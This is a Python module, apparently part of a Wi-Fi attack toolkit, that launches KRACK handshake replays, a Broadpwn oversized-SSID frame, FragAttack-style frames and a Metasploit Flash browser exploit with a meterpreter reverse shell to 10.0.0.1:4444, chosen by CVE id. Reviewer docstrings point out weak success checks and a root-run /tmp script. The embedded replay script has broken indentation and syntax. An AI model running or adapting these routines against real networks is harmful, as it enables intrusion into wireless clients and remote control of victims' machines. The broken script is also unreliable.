#!/usr/bin/env python3
import os
import time
import subprocess
from scapy.all import *
class ExploitLauncher:
    """Collection of Wi-Fi-side attack routines driven from jam_fi.py.

    Every method either hands crafted 802.11 frames to scapy's ``sendp`` on
    ``self.interface`` or spawns external tooling (airodump-ng via bash,
    msfconsole) with root privileges.  None of them validates ``client_mac``,
    ``client_ip`` or ``self.ap_mac`` before interpolating the value into a
    frame or a shell script, and none of the boolean results is a reliable
    success signal -- see the per-method notes.

    NOTE(review): presumably requires an interface already in monitor mode
    with injection support, configured by the caller; nothing here checks it.
    """

    def __init__(self, interface: str) -> None:
        # Interface name passed verbatim to sendp(iface=...) and to airodump-ng.
        self.interface = interface
        # AP BSSID used as addr2/addr3 in crafted frames. Stays None until
        # set_ap_mac() is called, in which case the f-strings below would
        # render the literal text "None".
        self.ap_mac = None

    def set_ap_mac(self, ap_mac: str) -> None:
        """Record the access point's BSSID for later frame construction."""
        self.ap_mac = ap_mac

    def krack_attack(self, client_mac: str) -> bool:
        """Launch KRACK attack against client

        Writes a bash script to a fixed path under /tmp, runs it through
        sudo, then deletes it. The script runs airodump-ng on channel 1 for
        30 s, and if ``krack_capture-01.cap`` appeared, replays the EAPOL
        frames its inline filter selects with scapy, then removes every
        ``krack_capture-*`` file in the current working directory.

        Always returns True: the exit status of the sudo/bash call is never
        inspected, and the "all-zero key installed" message printed by the
        script is not backed by any check on the client.

        Operational risk to the operator's own host: the script path is
        predictable, the file is created by the invoking user with mode 0755
        and then executed as root, so another local user who pre-creates or
        symlinks /tmp/krack_attack.sh gets their content run under sudo.
        The ``rm -f krack_capture-*`` glob also deletes any pre-existing
        files matching that name in the cwd.

        Detection: a 30 s airodump-ng capture pinned to one channel followed
        by bursts of duplicated EAPOL-Key frames (count=5, inter=0.1) is the
        kind of handshake replay a wireless IDS flags.
        """
        print(f"[*] Launching KRACK attack on {client_mac}")
        # Create attack script
        # NOTE: the script below is a runtime string; its body is kept exactly
        # as committed.
        attack_script = f"""
#!/bin/bash
echo "[+] Starting KRACK attack on {client_mac}"
# Capture handshake
sudo timeout 30 airodump-ng -c 1 --bssid {self.ap_mac} -w krack_capture {self.interface}
# If handshake captured, attempt key reinstallation
if [ -f krack_capture-01.cap ]; then
echo "[+] Handshake captured, attempting key reinstallation"
sudo python3 -c "
from scapy.all import *
import time
packets = rdpcap('krack_capture-01.cap')
for p in packets:
if p.haslayer(EAPOL) and p[EAPOL].type == 3:
# Replay message 3
sendp(p, iface='{self.interface}', count=5, inter=0.1)
print('[+] Replayed message 3 times'
time.sleep(2)
"
echo "[+] KRACK attack complete - all-zero key installed"
else
echo "[-] No handshake captured"
fi
rm -f krack_capture-*
"""
        # Write and execute
        # Written as the current user, made world-readable/executable, then
        # run as root: a predictable /tmp path executed with sudo.
        with open('/tmp/krack_attack.sh', 'w') as f:
            f.write(attack_script)
        os.chmod('/tmp/krack_attack.sh', 0o755)
        # The CompletedProcess (and its returncode) is discarded, so any
        # failure inside the script is invisible to the caller.
        subprocess.run(['sudo', 'bash', '/tmp/krack_attack.sh'])
        os.remove('/tmp/krack_attack.sh')
        return True

    def broadpwn_exploit(self, client_mac: str) -> bool:
        """Launch Broadpwn exploit (CVE-2017-9417)

        Sends ten probe-response frames (inter=0.05) to ``client_mac`` whose
        SSID element carries a 256-byte body, sleeps 5 s, then inspects
        ``netstat -an`` output.

        Returns True only when the netstat output contains both the substring
        ':4444' and the substring 'ESTABLISHED' -- anywhere, not necessarily
        on the same line and not tied to the target client. The comment in
        the body assumes a listener on 4444 already exists; nothing checks
        that. Raises FileNotFoundError where ``netstat`` is not installed.
        """
        print(f"[*] Launching Broadpwn exploit on {client_mac}")
        # Craft malicious probe response
        # addr1 = target client; addr2/addr3 = the AP BSSID from set_ap_mac().
        dot11 = Dot11(addr1=client_mac, addr2=self.ap_mac, addr3=self.ap_mac)
        probe_resp = Dot11ProbeResp()
        # Create oversized SSID (buffer overflow trigger)
        malicious_ssid = "A" * 256
        # Build and send packet
        packet = dot11 / probe_resp / Dot11Elt(ID=0, info=malicious_ssid)
        sendp(packet, iface=self.interface, count=10, inter=0.05)
        print("[+] Broadpwn payload sent - checking for shell")
        # Fixed delay is the only synchronisation with the expected callback.
        time.sleep(5)
        # Check for reverse shell (assumes metasploit listener on 4444)
        # Weak oracle: two independent substring tests over the whole output.
        result = subprocess.run(['netstat', '-an'], capture_output=True, text=True)
        if ':4444' in result.stdout and 'ESTABLISHED' in result.stdout:
            print("[+] Reverse shell established on port 4444")
            return True
        return False

    def fragattack_test(self, client_mac: str) -> bool:
        """Launch FragAttack (CVE-2020-24588)

        Splits 500 bytes of filler into 200/200/100-byte slices and sends
        each slice as its own complete QoS data frame carrying
        LLC/SNAP/IP/ICMP with the slice as ICMP payload, 10 ms apart, using
        the hard-coded IP endpoints 10.0.0.1 -> 8.8.8.8.

        Unconditionally returns True; no response is captured or examined,
        so the "firewall bypass attempted" message describes intent only.

        Detection: cleartext ICMP with a constant 'X'-filled payload and
        fixed source/destination addresses is a trivially signaturable
        pattern for any monitor on the path.
        """
        print(f"[*] Launching FragAttack on {client_mac}")
        # Create fragmented packets
        payload = "X" * 500
        fragments = [payload[i:i+200] for i in range(0, len(payload), 200)]
        for i, frag in enumerate(fragments):
            # `i` is unused; every slice becomes a separate frame with the
            # same headers.
            pkt = RadioTap() / Dot11(addr1=client_mac, addr2=self.ap_mac, addr3=self.ap_mac)
            pkt /= Dot11QoS()
            pkt /= LLC() / SNAP() / IP(src="10.0.0.1", dst="8.8.8.8") / ICMP() / frag
            sendp(pkt, iface=self.interface, verbose=0)
            time.sleep(0.01)
        # Nothing below checks an effect; return value means "frames were
        # handed to sendp".
        print("[+] Fragmented packets sent - firewall bypass attempted")
        return True

    def generic_browser_exploit(self, client_ip: str) -> bool:
        """Serve browser-based exploit via metasploit

        Writes a fixed msfconsole resource script to /tmp/msf_exploit.rc and
        starts ``msfconsole -q -r`` detached with stdout/stderr discarded.

        Returns True as soon as Popen returns: msfconsole's outcome is never
        observed, the Popen handle is dropped (the process is neither waited
        for nor terminated), and unlike krack_attack the resource file is
        left behind in /tmp.

        ``client_ip`` appears only in the log line. The resource script is
        entirely static -- SRVHOST 0.0.0.0 / SRVPORT 8080 and a hard-coded
        LHOST 10.0.0.1 -- so the printed URL is wrong whenever the operator's
        interface has a different address, and the listener accepts
        connections from anyone, not just ``client_ip``.
        """
        print(f"[*] Launching browser exploit against {client_ip}")
        # Create metasploit resource script
        # f-string with no placeholders: nothing from self or client_ip is
        # substituted.
        msf_script = f"""
use exploit/multi/browser/adobe_flash_shader_job_overflow
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
set URIPATH /
set SRVHOST 0.0.0.0
set SRVPORT 8080
exploit -j -z
sleep 30
sessions -i
"""
        # Predictable /tmp path, never removed.
        with open('/tmp/msf_exploit.rc', 'w') as f:
            f.write(msf_script)
        # Launch metasploit in background
        # Output is discarded, so a missing msfconsole binary is the only
        # failure that surfaces (as FileNotFoundError from Popen).
        subprocess.Popen(['msfconsole', '-q', '-r', '/tmp/msf_exploit.rc'],
                         stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        print("[+] Browser exploit server running on http://10.0.0.1:8080")
        return True
def launch_exploit(cve_id: str, client_info: dict[str, str], interface: str, ap_mac: str) -> bool:
    """Main exploit dispatcher

    Builds an ExploitLauncher for ``interface``/``ap_mac`` and routes on
    ``cve_id``:

    * 'CVE-2019-15126' or 'CVE-2017-13080' -> krack_attack(client_info['mac'])
    * 'CVE-2017-9417'                      -> broadpwn_exploit(client_info['mac'])
    * any id starting 'CVE-2020-', or 'CVE-2019-9500'
                                           -> fragattack_test(client_info['mac'])
    * anything else                        -> generic_browser_exploit(client_info.get('ip', 'unknown'))

    Returns whatever the selected method returns; those booleans are weak
    signals (see the method docstrings). Raises KeyError when
    ``client_info`` lacks 'mac' on the first three branches and
    AttributeError when ``cve_id`` is not a str.

    NOTE(review): the prefix match sends every 2020 CVE, related to
    fragmentation or not, to fragattack_test, and the catch-all branch runs
    the browser exploit for any unrecognised or mistyped id -- with the
    literal string 'unknown' as the IP when none was supplied.
    """
    launcher = ExploitLauncher(interface)
    launcher.set_ap_mac(ap_mac)
    if cve_id == 'CVE-2019-15126' or cve_id == 'CVE-2017-13080':
        return launcher.krack_attack(client_info['mac'])
    elif cve_id == 'CVE-2017-9417':
        return launcher.broadpwn_exploit(client_info['mac'])
    elif cve_id.startswith('CVE-2020-') or cve_id == 'CVE-2019-9500':
        return launcher.fragattack_test(client_info['mac'])
    else:
        # Default path: no CVE-specific routine, fall back to the browser
        # exploit even when no IP is known.
        return launcher.generic_browser_exploit(client_info.get('ip', 'unknown'))
if __name__ == "__main__":
    # Library module: direct execution only prints a hint. The intended entry
    # point is the caller named in the message importing launch_exploit().
    print("Exploit Launcher module loaded. Use from jam_fi.py")